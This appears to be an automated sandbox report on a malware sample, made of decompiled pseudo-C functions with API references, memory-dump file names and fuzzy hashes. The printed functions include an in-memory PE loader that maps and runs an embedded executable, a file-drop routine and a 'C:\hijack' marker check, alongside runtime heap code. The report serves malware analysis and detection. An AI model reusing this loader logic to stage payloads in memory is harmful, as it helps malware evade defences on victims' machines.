                                                                                                                                                      								 *_v28 = _v8 + _v12[0x1e];
                                                                                                                                                      								 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
                                                                                                                                                      								E00405599(_a4, _v36, _v28); // executed
                                                                                                                                                      								_t158 = _t156 + 0x18;
                                                                                                                                                      								_t149 = _v16 -  *(_v36 + 0x34);
                                                                                                                                                      								_v32 = _t149;
                                                                                                                                                      								if(_t149 != 0) {
                                                                                                                                                      									E00405809(_v28, _v32);
                                                                                                                                                      									_t158 = _t158 + 8;
                                                                                                                                                      								}
                                                                                                                                                      								_t102 = E004058E9(_v28); // executed
                                                                                                                                                      								if(_t102 != 0) {
                                                                                                                                                      									E00405699(_v28); // executed
                                                                                                                                                      									if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
                                                                                                                                                      										L18:
                                                                                                                                                      										return _v28;
                                                                                                                                                      									}
                                                                                                                                                      									_v24 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
                                                                                                                                                      									_v20 = _v24(_v16, 1, 0);
                                                                                                                                                      									if(_v20 != 0) {
                                                                                                                                                      										 *(_v28 + 8) = 1;
                                                                                                                                                      										goto L18;
                                                                                                                                                      									}
                                                                                                                                                      									L19:
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						_v16 = _a16(0,  *(_v36 + 0x50), 0x3000, 4);
                                                                                                                                                      						if(_v16 != 0) {
                                                                                                                                                      							goto L7;
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}

















                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: mQ@
                                                                                                                                                      • API String ID: 0-1781705956
                                                                                                                                                      • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                      • Instruction ID: 541d6754dc273e5e7774517d21eb6bbd513450c5919ac0484350b505b9df1b02
                                                                                                                                                      • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                      • Instruction Fuzzy Hash: 3F61EBB4E00609EFDB04CF94C885AAFBBB5FF48314F108559E905AB381D775A941CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405599(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				_t1 =  &_a12; // 0x4052e0
                                                                                                                                                      				_v20 =  *((intOrPtr*)( *_t1 + 4));
                                                                                                                                                      				_t4 =  &_a12; // 0x4052e0
                                                                                                                                                      				_t5 =  &_a12; // 0x4052e0
                                                                                                                                                      				_v24 =  *((intOrPtr*)( *_t4)) + ( *( *((intOrPtr*)( *_t5)) + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t15 =  &_a12; // 0x4052e0
                                                                                                                                                      					_t55 =  *((intOrPtr*)( *_t15));
                                                                                                                                                      					if(_v8 >= ( *(_t55 + 6) & 0x0000ffff)) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if( *(_v24 + 0x10) != 0) {
                                                                                                                                                      						_t39 =  &_v20; // 0x4052e0
                                                                                                                                                      						_t58 = VirtualAlloc( *_t39 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
                                                                                                                                                      						_v12 = _t58;
                                                                                                                                                      						E004053A9(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
                                                                                                                                                      						_t100 = _t100 + 0xc;
                                                                                                                                                      						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v16 =  *((intOrPtr*)(_a8 + 0x38));
                                                                                                                                                      						if(_v16 > 0) {
                                                                                                                                                      							_t26 =  &_v20; // 0x4052e0
                                                                                                                                                      							_t28 =  &_a12; // 0x4052e0
                                                                                                                                                      							_v12 =  *((intOrPtr*)( *((intOrPtr*)( *_t28 + 0x14))))( *_t26 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
                                                                                                                                                      							 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                      							E00405369(_v12, _v12, 0, _v16);
                                                                                                                                                      							_t100 = _t100 + 0xc;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _v8 + 1;
                                                                                                                                                      					_v24 = _v24 + 0x28;
                                                                                                                                                      				}
                                                                                                                                                      				return _t55;
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID: R@$R@
                                                                                                                                                      • API String ID: 4275171209-183225046
                                                                                                                                                      • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                      • Instruction ID: 8040a1e4124e533603aae13ccacedffe6b0048f7b84320d0b4bad592607f7773
                                                                                                                                                      • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                      • Instruction Fuzzy Hash: 0F41BAB4A00209DFCB08CF88C990AAEB7B1FF48304F208559E915AB395D775EE51CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1000CE64(void* __edx) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t1;
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      
                                                                                                                                                      				_t18 = __edx;
                                                                                                                                                      				_t12 = HeapAlloc;
                                                                                                                                                      				do {
                                                                                                                                                      					_t32 =  *0x10333310; // 0x800000
                                                                                                                                                      					_t20 = _t30;
                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                      						E100119E6(_t12, _t18, _t20, _t32);
                                                                                                                                                      						E10011846(0x1e);
                                                                                                                                                      						E100115A8(0xff);
                                                                                                                                                      					}
                                                                                                                                                      					_t1 =  *0x10335f3c;
                                                                                                                                                      					if(_t1 != 1) {
                                                                                                                                                      						__eflags = _t1 - 3;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							L10:
                                                                                                                                                      							__eflags = _t30;
                                                                                                                                                      							if(_t30 == 0) {
                                                                                                                                                      								_t20 = 1;
                                                                                                                                                      								__eflags = 1;
                                                                                                                                                      							}
                                                                                                                                                      							_t22 = _t20 + 0x0000000f & 0xfffffff0;
                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                      							_push(_t22);
                                                                                                                                                      							goto L13;
                                                                                                                                                      						} else {
                                                                                                                                                      							_push(_t30);
                                                                                                                                                      							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
                                                                                                                                                      							__eflags = _t2;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								goto L10;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                      							_t10 = 1;
                                                                                                                                                      							__eflags = 1;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t10 = _t30;
                                                                                                                                                      						}
                                                                                                                                                      						_push(_t10);
                                                                                                                                                      						L13:
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t2 = RtlAllocateHeap( *0x10333310); // executed
                                                                                                                                                      					}
                                                                                                                                                      					_t28 = _t2;
                                                                                                                                                      					if(_t28 == 0) {
                                                                                                                                                      						_t24 = 0xc;
                                                                                                                                                      						if( *0x103337d4 == _t2) {
                                                                                                                                                      							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
                                                                                                                                                      							L19:
                                                                                                                                                      							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t28;
                                                                                                                                                      					L16:
                                                                                                                                                      					_t6 = E100108CA(_t30);
                                                                                                                                                      					_t37 = _t6;
                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                      				goto L19;
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                        • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                        • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                        • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                        • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3791426274-0
                                                                                                                                                      • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                      • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC10(CHAR* _a4, void* _a8, long _a12) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				long _v12;
                                                                                                                                                      				struct _OVERLAPPED* _v16;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				int _t14;
                                                                                                                                                      
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                                      				_v8 = _t12;
                                                                                                                                                      				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
                                                                                                                                                      				if(_t14 != 0) {
                                                                                                                                                      					_v16 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				CloseHandle(_v8);
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                      • WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                      • CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1065093856-0
                                                                                                                                                      • Opcode ID: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                      • Instruction ID: 8035e793fd9196c22525ec6c46e761f67ba1426afb40fad35566dc0bfd35744e
                                                                                                                                                      • Opcode Fuzzy Hash: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                      • Instruction Fuzzy Hash: A3F0BD75B40208BBEB14DFD4DD95F9EB7B8EB48700F20C148FA18AB280D675AA059B64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001F1C0() {
                                                                                                                                                      				int _t1;
                                                                                                                                                      
                                                                                                                                                      				_t1 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                      				return _t1;
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                      • String ID: C:\hijack
                                                                                                                                                      • API String ID: 1174141254-148195797
                                                                                                                                                      • Opcode ID: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                      • Instruction ID: cbcd4ec5042ff81f7f552497cc273b56006d66024910556231888f1c34088e01
                                                                                                                                                      • Opcode Fuzzy Hash: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                      • Instruction Fuzzy Hash: 71A022300C020CB3800023CABC0C8E0BB0CC8888333800000FA0E000008B23202000AA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00405279(void* __eax) {
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t90;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      
                                                                                                                                                      				_t88 = _t87 + 1;
                                                                                                                                                      				0x8958a00a();
                                                                                                                                                      				asm("sbb [edx+0x4], ch");
                                                                                                                                                      				 *((intOrPtr*)(_t88 - 4)) = VirtualAlloc( *(_t88 - 0xc),  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54), 0x1000, ??);
                                                                                                                                                      				E004053A9( *((intOrPtr*)(_t88 - 4)),  *((intOrPtr*)(_t88 - 8)),  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c)) +  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54));
                                                                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) =  *((intOrPtr*)(_t88 - 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c));
                                                                                                                                                      				 *( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x34) =  *(_t88 - 0xc);
                                                                                                                                                      				E00405599( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 - 0x20)),  *((intOrPtr*)(_t88 - 0x18))); // executed
                                                                                                                                                      				_t92 = _t90 + 0x18;
                                                                                                                                                      				_t82 =  *(_t88 - 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x20)) + 0x34));
                                                                                                                                                      				 *((intOrPtr*)(_t88 - 0x1c)) = _t82;
                                                                                                                                                      				if(_t82 != 0) {
                                                                                                                                                      					E00405809( *((intOrPtr*)(_t88 - 0x18)),  *((intOrPtr*)(_t88 - 0x1c)));
                                                                                                                                                      					_t92 = _t92 + 8;
                                                                                                                                                      				}
                                                                                                                                                      				_t55 = E004058E9( *((intOrPtr*)(_t88 - 0x18))); // executed
                                                                                                                                                      				if(_t55 != 0) {
                                                                                                                                                      					E00405699( *((intOrPtr*)(_t88 - 0x18))); // executed
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28)) == 0) {
                                                                                                                                                      						L8:
                                                                                                                                                      						_t58 =  *((intOrPtr*)(_t88 - 0x18));
                                                                                                                                                      					} else {
                                                                                                                                                      						 *((intOrPtr*)(_t88 - 0x14)) =  *(_t88 - 0xc) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28));
                                                                                                                                                      						 *((intOrPtr*)(_t88 - 0x10)) =  *((intOrPtr*)(_t88 - 0x14))( *(_t88 - 0xc), 1, 0);
                                                                                                                                                      						if( *((intOrPtr*)(_t88 - 0x10)) != 0) {
                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)) + 8)) = 1;
                                                                                                                                                      							goto L8;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L9:
                                                                                                                                                      					_t58 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				return _t58;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00405293
                                                                                                                                                        • Part of subcall function 00405599: VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID: mQ@
                                                                                                                                                      • API String ID: 4275171209-1781705956
                                                                                                                                                      • Opcode ID: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
                                                                                                                                                      • Instruction ID: dbaf598f9aa3cdeea1fef9ad7be1053e3f902deb7a8d8a95dff736660d86b170
                                                                                                                                                      • Opcode Fuzzy Hash: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
                                                                                                                                                      • Instruction Fuzzy Hash: 5921F9B5E00109AFCB44DFA9C881DAFBBB5FF8C300B108259E904A7345E679E951CFA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001F1D0(void* __edi, intOrPtr _a4, char _a8) {
                                                                                                                                                      				char* _v8;
                                                                                                                                                      				char _v70491;
                                                                                                                                                      				char _v70492;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      
                                                                                                                                                      				E10018AA0(0x11358); // executed
                                                                                                                                                      				_t12 = E1001F1C0(); // executed
                                                                                                                                                      				if(_t12 != 0) {
                                                                                                                                                      					_v70492 = 0;
                                                                                                                                                      					E1000CF20(__edi,  &_v70491, 0, 0x1134f);
                                                                                                                                                      					_v8 =  &_a8;
                                                                                                                                                      					_t16 = E10001D10( &_v70492, 0x1134f, _a4, _v8);
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					OutputDebugStringA( &_v70492);
                                                                                                                                                      					return _t16;
                                                                                                                                                      				}
                                                                                                                                                      				return _t12;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1001F1C0: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                      • _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 10001D10: __vsnprintf_s.LIBCMT ref: 10001D27
                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3726070730-0
                                                                                                                                                      • Opcode ID: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                      • Instruction ID: d1c4eaeef2fe96386540b73fb7cae86f07877a9616b03c9c3f3d83701942bdc8
                                                                                                                                                      • Opcode Fuzzy Hash: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                      • Instruction Fuzzy Hash: DDF09079900348B7DB48DBE5DC46FE9B37EDB04A00F5440C9FA1897649EA70F7848BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000F7BF(intOrPtr _a4) {
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      
                                                                                                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                      				 *0x10333310 = _t6;
                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                      					_t7 = E1000F764(__eflags);
                                                                                                                                                      					__eflags = _t7 - 3;
                                                                                                                                                      					 *0x10335f3c = _t7;
                                                                                                                                                      					if(_t7 != 3) {
                                                                                                                                                      						L5:
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      						return 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t10 = E1000FA34(0x3f8);
                                                                                                                                                      						__eflags = _t10;
                                                                                                                                                      						if(_t10 != 0) {
                                                                                                                                                      							goto L5;
                                                                                                                                                      						} else {
                                                                                                                                                      							HeapDestroy( *0x10333310);
                                                                                                                                                      							 *0x10333310 =  *0x10333310 & 0x00000000;
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L1:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3296620671-0
                                                                                                                                                      • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                      • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
